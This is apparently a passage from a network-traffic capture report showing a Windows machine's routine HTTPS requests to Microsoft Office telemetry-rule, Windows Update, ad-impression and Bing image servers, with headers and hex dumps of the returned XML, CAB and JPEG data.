2024-11-21 08:53:50 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:50 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 918e3103-701e-0097-4a7c-3bb8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085350Z-1777c6cb7549x5qchC1TEBggbg0000000av000000000dw52 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:50 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.6	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:50 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:50 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:50 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 8b710333-301e-0020-767a-3b6299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085350Z-178bfbc474b9xljthC1NYCtw940000000160000000004k50 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:53:50 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	49770	20.234.120.54	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:50 UTC	602	OUT	GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=532834141&PG=PC000P0FR5.0000000IRU&REQASID=3231C04CB2E542AD8FF0B98138491059&UNID=338389&ASID=b7a7790eefe24cf693e928a22d328dc1&&DS_EVTID=3231C04CB2E542AD8FF0B98138491059&DEVOSVER=10.0.19045.2006&REQT=20241121T085332&TIME=20241121T085341Z&ARCRAS=&CLR=CDM HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2024-11-21 08:53:51 UTC	183	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 191cff6f-2aec-47ea-a785-1358d5e800ca Date: Thu, 21 Nov 2024 08:53:50 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	49771	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:51 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RT2Ar76CfwNaFOF&MD=4E5ho6Ol HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-21 08:53:52 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: b046da9d-7f24-48b9-a532-b61ad427aa45 MS-RequestId: 19c62049-55f1-4f8b-84fa-02b393c84278 MS-CV: qVqCNxfOukmJTbj1.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 21 Nov 2024 08:53:51 GMT Connection: close Content-Length: 24490
2024-11-21 08:53:52 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-21 08:53:52 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49772	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:51 UTC	375	OUT	GET /th?id=OADD2.10239398628217_1Y51RF6NU1PGVC1I5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-21 08:53:52 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 573709 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: CD77579DFAB543D3803D830991ED52EB Ref B: EWR30EDGE1410 Ref C: 2024-11-21T08:53:51Z Date: Thu, 21 Nov 2024 08:53:51 GMT Connection: close
2024-11-21 08:53:52 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 4e 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 35 20 31 33 3a 32 37 3a 31 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``NExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:05 13:27:158
2024-11-21 08:53:52 UTC	16384	IN	Data Raw: a4 db 4b b2 8e 64 2e 56 47 86 34 6d 35 22 a5 39 52 8e 61 f2 b2 2d 94 9b 2a c2 a5 2f 97 53 cc 1c 8c ac c9 49 b6 ad 79 79 a0 c5 47 38 72 b2 b6 ca 5d 95 3f 95 ed 47 94 68 e6 0e 56 57 d9 46 da b1 e5 1a 51 03 1a 7c e8 9e 46 55 db 4b b6 ad 79 0c 3f 86 85 84 d1 ce 83 91 95 19 4d 26 d3 57 3c 93 4d 68 a8 e6 43 e4 65 4d a6 91 94 d5 bf 29 a9 ad 11 a7 cc 85 ca cf 2a 51 4e e6 97 14 62 bd a3 cf 12 95 68 c5 18 c5 30 1c a6 9d 9a 65 3b 9a 40 2e 69 56 9b 4a b9 a0 77 1f cd 14 d5 a5 cd 03 17 9a 39 a4 cd 23 1a 00 28 e9 45 1c d0 00 a6 97 34 cc fb d1 9f 7a 00 93 3e f4 b9 a8 f3 46 68 02 5c fb d2 ee a8 77 51 ba 80 b9 3a 91 4e 52 2a 05 6a 72 bd 4d 80 9f 2b 4e 53 55 f7 d2 ab d1 60 d0 b0 ad 4e 56 15 5f 7d 0a f4 ac c2 e5 ad d4 33 0a ac af 4b be 95 98 ee 4d b8 52 ee 15 06 ea 4d f8 a7 Data Ascii: Kd.VG4m5"9Ra-/SIyyG8r]?GhVWFQ\|FUKy?M&W<MhCeM)QNbh0e;@.iVJw9#(E4z>Fh\wQ:NR*jrM+NSU`NV_}3KMRM
2024-11-21 08:53:52 UTC	16384	IN	Data Raw: a4 f7 15 62 1d 56 4f 0d 78 75 92 de f2 e6 7d 36 ce 3f 36 3b 16 b6 1e 5b 01 fe c9 ce 3a f5 c6 6b c7 ce 25 4b 11 56 82 85 6e 57 19 5f e1 6e eb ee dc f5 70 14 31 94 29 d4 6a 95 e2 d7 49 47 a7 cc f3 4b ad 2e dd 7e 2f da e9 9a 75 a6 a5 3c d3 49 fe 8d f6 b8 7c e7 90 b4 7f 22 95 80 fc c0 91 d5 4f 4f 61 53 58 e8 77 17 7e 2a d5 9a d5 34 77 b7 d1 ed 66 9b 52 ba 56 7f b0 4d b2 5c 45 f6 77 5f e2 95 b8 8c 3e 01 63 4b e3 fd 7a df c4 5e 26 b3 f1 16 8a b7 7a 6e b1 02 ec 91 d2 37 d9 b0 21 c3 8d 80 15 65 19 e4 7f 4a c3 bc d1 af 2c f5 04 d3 a0 d7 3f d1 2f ad 12 6b db 98 a3 97 ec b2 47 e6 02 86 45 4c 92 a1 99 47 cc 38 3e f5 ed 46 34 d7 2a 72 bb b7 f7 ba 1e 77 35 69 27 2e 5b 6a bf 97 fe 09 ef 7f b1 5e a5 65 0e ad e2 5d 2e f7 55 68 2e 5a fa 27 d3 ec 7e d6 52 39 84 91 b8 7c 43 Data Ascii: bVOxu}6?6;[:k%KVnW_np1)jIGK.~/u<I\|"OOaSXw~4wfRVM\Ew_>cKz^&zn7!eJ,?/kGELG8>F4rw5i'.[j^e].Uh.Z'~R9\|C
2024-11-21 08:53:52 UTC	16384	IN	Data Raw: 17 1c 67 3f 88 af a3 c9 70 f3 fa fb 8b e9 07 f9 a6 72 63 aa a8 c2 33 5a a6 ca f2 41 2e b9 f1 32 e7 42 95 56 4d 3a c6 f6 5d 4a ee 36 f9 7c e7 57 d8 89 9e eb 91 d2 bc a7 e3 c7 88 24 d7 7e 21 5e 05 dd e4 d8 b7 d9 a3 5f e1 5d bf 7b 03 fd ec d7 a9 ea e5 74 df 09 fc 40 d4 6d 5b 65 cc 73 25 b4 4d 1b 7f ab 1c 9e 0f 6e 5b b5 7c ff 00 77 21 9e 56 b8 69 32 5b ef 33 72 58 f7 27 d6 be f7 23 c3 c6 75 5d 57 b4 52 8a f5 69 36 cf 94 e2 4c 4b 85 05 45 6f 37 cc fd 13 69 2f d4 f6 2f d8 c7 c3 cf ac 7c 42 6d 52 45 91 74 fd 33 06 40 cc 42 49 21 fb a1 b1 d7 00 13 8a ec 7f 68 4f 2a f3 e2 a4 b0 6f 6b 59 23 d2 60 30 6d 5e 39 92 57 2a 06 7b 8f cf 9a ec ff 00 65 bf 08 ff 00 c2 37 f0 ca ce 3b a8 d7 ed 9a 9c a2 e9 d9 7e f2 e7 18 53 f4 cf e3 8a e1 3e 39 43 f6 bf 8b 1a c3 cb 2a c8 d6 d6 Data Ascii: g?prc3ZA.2BVM:]J6\|W$~!^_]{t@m[es%Mn[\|w!Vi2[3rX'#u]WRi6LKEo7i//\|BmREt3@BI!hOokY#`0m^9W{e7;~S>9C*
2024-11-21 08:53:52 UTC	16384	IN	Data Raw: df 6f fa aa 95 3c 32 43 7d d6 5a ee a1 b4 f2 f8 12 6e 1f ed 55 94 b7 1d ea 39 a5 dc 97 52 9a e8 71 56 7e 19 6f f7 6b 46 1f 0e ed eb 5d 4c 71 05 a7 ed 14 ac df 52 7e b1 6d 91 cd 7f 61 80 bf de a8 24 d0 63 3d 63 ae ad a3 a1 63 07 aa d2 b0 2c 51 ca 5b e8 08 ad 91 ba b4 ed 74 d6 4f e2 ad a5 89 3f bb 4e 0a 05 16 25 e2 9b d9 14 a3 b7 64 a9 96 1f 55 ab 0a 05 2d 55 8c 5d 46 ca fe 4a 8a 42 88 3f 86 ac f3 40 02 8b 13 ce ca 81 b1 d1 1a a7 8f 61 ea b5 2e 05 18 14 09 ca e4 7b 62 fe ed 2a c5 19 a7 e0 52 d3 27 99 f7 1a b1 a0 a5 d8 b4 ee 29 79 a0 57 63 36 0a 4d 82 a4 e6 8e 68 17 33 23 d8 28 d8 2a 4a 28 1f 33 23 d9 4e 51 4e a7 73 40 ae 31 45 2d 3b 9a 39 a6 ac 21 b4 ee 68 e6 8e 68 00 cf bd 19 f7 a3 9a 39 a6 2b 0b 9a 5a 6e 7d e9 73 40 85 e6 93 02 8c d1 9a 00 5a 63 46 4f f1 Data Ascii: o<2C}ZnU9RqV~okF]LqR~ma$c=cc,Q[tO?N%dU-U]FJB?@a.{bR')yWc6Mh3#(J(3#NQNs@1E-;9!hh9+Zn}s@ZcFO
2024-11-21 08:53:52 UTC	16384	IN	Data Raw: 83 13 54 4b a1 4f 13 64 2b 55 2f 64 47 2d 73 a2 5d 66 7b 85 cc 93 ad 45 79 ad 7d 9d 7e 46 dd 59 0b 63 38 e8 b5 05 cd 8d cb f0 55 aa 57 2f 52 df b4 b6 c6 bd bf 8a ae 11 b8 9f 6f fc 0a b4 ec 7c 5f 2e ef f5 f5 ca da e8 b2 3b 73 f2 d6 b6 9f e1 d7 2d 4e 4e 98 46 15 9e e8 e8 6e 3c 70 56 1f 2c 23 56 5b 78 a6 59 26 e2 46 5d d4 eb 5f 0d c8 d6 f1 bc 8b cb 28 3f a5 49 ff 00 08 ba 16 e1 6b 3e 68 16 a9 cd 6d 63 5f 41 f1 4a 41 b4 ca cc df ed 57 47 67 e3 18 a5 65 0b 16 e1 5c 42 78 7a 58 bf 87 e5 ab 96 ba 3c b1 48 a6 3f 96 a7 9a db 04 f0 f4 e7 ac d1 ea 3a 6d d0 ba 85 5c 47 56 b6 29 fe 1a e4 b4 3d 4e 5b 08 d5 65 56 61 5d 3e 9f a8 c1 76 99 8d b9 fe eb 56 b0 9a 68 f0 f1 58 69 d2 93 69 7b a4 c2 25 fe ed 36 4b 75 3d 55 6a 6d c0 50 ae 0f 46 ab d0 e4 e6 91 f0 f7 fc 14 3a f2 f2 Data Ascii: TKOd+U/dG-s]f{Ey}~FYc8UW/Ro\|_.;s-NNFn<pV,#V[xY&F]_(?Ik>hmc_AJAWGge\BxzX<H?:m\GV)=N[eVa]>vVhXii{%6Ku=UjmPF:
2024-11-21 08:53:52 UTC	16384	IN	Data Raw: 3f a7 fc 4d f1 2e 9b 71 2c ba 67 d9 2d a4 96 0f 22 49 3c 80 ec c9 9c 8f bd 91 9f 7c 57 26 c3 b0 a4 55 07 a7 5a f4 69 d2 85 3c 3a c3 a5 ee 2e 9f 8f e6 61 29 39 57 75 df c7 df f0 fc 8e 8a f7 e2 17 8e 2f 26 f3 24 f1 2d f4 47 cc df fb 89 3c bd a7 d4 6c c5 66 5f 6b 7a cd f4 3e 5d ee af 7d 75 1b 36 76 cf 72 ee b9 f5 c1 3d 6a 93 00 3f d9 ae b7 e1 cf c3 8f 10 78 c7 45 9f 57 b2 89 6d ad 23 e2 09 2e 5b 67 da 9f 38 2a 9c 1c 7d 4f 14 9f b2 a3 1b d9 24 39 54 9c 9d 9b 6f f1 39 24 51 bb f8 6a c4 64 6e f7 ae e3 c4 3f 0d 56 d6 f9 b4 7d 2f 53 69 35 f8 30 6e 74 6b d8 d2 39 19 31 9f 32 19 73 e5 c8 9f f7 c9 ac 57 f0 27 8c 21 da 5f c3 d7 2c ac d8 56 8d 91 97 3e 99 07 8f c6 ba 55 1a 92 4a 51 57 4f aa d4 e3 fa f6 19 36 9c d2 6b 74 f4 7f 73 32 63 63 ba ac 23 e5 b9 a8 6f ad 2e f4 Data Ascii: ?M.q,g-"I<\|W&UZi<:.a)9Wu/&$-G<lf_kz>]}u6vr=j?xEWm#.[g8*}O$9To9$Qjdn?V}/Si50ntk912sW'!_,V>UJQWO6kts2cc#o.
2024-11-21 08:53:52 UTC	16065	IN	Data Raw: 90 bc f3 ca db 52 30 3b 92 6a a7 8d fc 49 a2 f8 47 c3 b3 eb 9e 20 be 5b 3b 38 3f 89 b9 69 1f b2 22 f5 66 3d 80 af 8b bf 68 4f 8c 9a cf c4 6d 4b ec b1 ab 69 fa 0c 12 66 db 4f 56 e6 43 ff 00 3d 26 23 ef 37 a0 e8 bf 5e 6b ab 07 81 a9 8a 9d a3 b7 73 2c 46 2a 14 63 77 b9 d4 7e d2 1f 1f 2e 7c 55 e7 f8 6f c2 12 c9 63 a1 f2 93 dd f2 93 6a 03 a1 f7 48 cf a7 56 ef e9 5e 09 34 ae 59 b0 fc 53 a4 f3 1d 77 88 9b 6e ec 34 9b 7e 5c fa 55 49 a4 ed 5f 6d 83 c1 52 c3 41 46 08 f9 7c 4e 2a 75 a5 79 30 2f b7 8a 86 e1 cf cc 29 8e fd f7 54 4e e7 b5 77 d8 e3 94 ac 76 9f b3 9c c6 db e3 46 8b 3f de 2a d3 1f fc 84 f5 f4 06 bd f1 22 4f 06 69 77 7a a6 a9 73 1a d8 c0 c4 f9 6c bf 33 39 e8 a8 3f bc 4f 6a f9 5f c2 fa ed ff 00 86 bc 49 6d ac e9 d1 47 25 cd ae ef 2d 67 5d c9 f3 21 53 90 08 Data Ascii: R0;jIG [;8?i"f=hOmKifOVC=&#7^ks,Fcw~.\|UocjHV^4YSwn4~\UI_mRAF\|Nuy0/)TNwvF?*"Oiwzsl39?Oj_ImG%-g]!S
2024-11-21 08:53:52 UTC	16384	IN	Data Raw: bf 76 b1 b6 6e 21 03 f8 98 13 f3 7d 38 af 6a 30 a5 f6 d6 a7 98 ea 4d 37 ca ce e3 c1 33 79 96 fa 9b 95 5d df da 12 0d db 7e 6a a7 f1 09 9d ac 54 9f 9b f7 c3 f9 3d 79 f7 8a 3c 5f aa 5a ad ce 97 a3 33 59 c3 79 72 67 92 f7 95 93 63 72 02 01 ca f1 d4 f5 fa 55 8f 0b f8 ab 54 d6 24 fe c5 d4 d7 ed 31 45 1f 99 1d ee dd ad c7 18 6f 5c e7 af 5a b5 38 28 f2 75 31 69 bd 4f 52 d1 10 bf c0 99 1c f4 58 18 7f e4 4a ce b2 f1 77 86 34 6f 0f d9 da 6a 3a d5 b4 13 47 17 cd 12 e5 e4 5e 4f 50 80 e3 f1 ad cf 0f 20 3f 00 e5 1d 96 09 7f 47 cd 78 d4 7a 35 ee 9d 78 f7 07 fb 2e 35 bc f3 24 8e 5b e5 2e d2 6d cb 36 d0 01 e8 06 6b 28 4e 51 6f 95 5d 9b ca 29 f2 df b1 e8 fa 96 ab a6 6a 3a d6 83 a9 69 f7 d0 4f 6a b2 92 d2 ab 7c ab 82 99 dd 9f bb 8f 7a ad 67 f1 2b c3 57 3e 22 97 4e 59 da 38 Data Ascii: vn!}8j0M73y]~jT=y<_Z3YyrgcrUT$1Eo\Z8(u1iORXJw4oj:G^OP ?Gxz5x.5$[.m6k(NQo])j:iOj\|zg+W>"NY8
2024-11-21 08:53:52 UTC	16384	IN	Data Raw: c6 ea e6 38 f9 89 b6 30 21 80 25 86 71 bb 9e bd 2b d9 f5 0f 1b e9 7a af 89 3f b1 a4 6d 13 58 be b5 89 24 b9 9f cc 67 81 48 60 0e e2 72 88 f9 ce 17 ad 7c f6 69 87 c6 d2 ac d5 0b 38 5b a6 af fa f9 9f 51 97 d6 f6 94 d3 ab bf 9e 87 31 e3 0f 87 d7 b7 d1 ac eb a7 ea 50 09 d9 a4 df 14 11 48 9c e4 f0 52 6c 9e 7d b3 56 7e 09 5a ea de 10 9e 0b 8d 4b 4a bd 5f b4 bc 4b 76 f2 f9 9b a4 3c 83 b6 3d a7 24 75 ce 7f 87 1d c8 ae a6 e7 58 b9 d2 e1 92 e2 0b 6d 37 4e b1 ba 97 c8 5f b4 c8 7e cc d2 1d fc 2e e3 8d cc 3b 0e b5 a3 e1 3d 4a 2d 4b 54 58 23 82 d1 a4 6b b5 92 da 58 e4 28 24 40 ce cc 54 f4 dd b5 ba 74 c0 c1 af 03 1d 88 c5 4a 93 85 58 de 2c f4 3d 9d 35 79 2d fd 4e 4f 58 d6 fc 59 7b e2 a9 ef ac 7c 07 ac c9 6d 25 ed 84 d1 f9 ba a2 43 b9 20 cf 99 f2 06 f9 73 9e 07 7e f8 e9 Data Ascii: 80!%q+z?mX$gH`r\|i8[Q1PHRl}V~ZKJ_Kv<=$uXm7N_~.;=J-KTX#kX($@TtJX,=5y-NOXY{\|m%C s~

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.6	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:52 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:52 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:52 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 0f1ce2f4-701e-0001-5e8c-3ab110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085352Z-r1d97b99577d6qrbhC1TEBux5s0000000a6000000000cs0d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:52 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.6	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:52 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
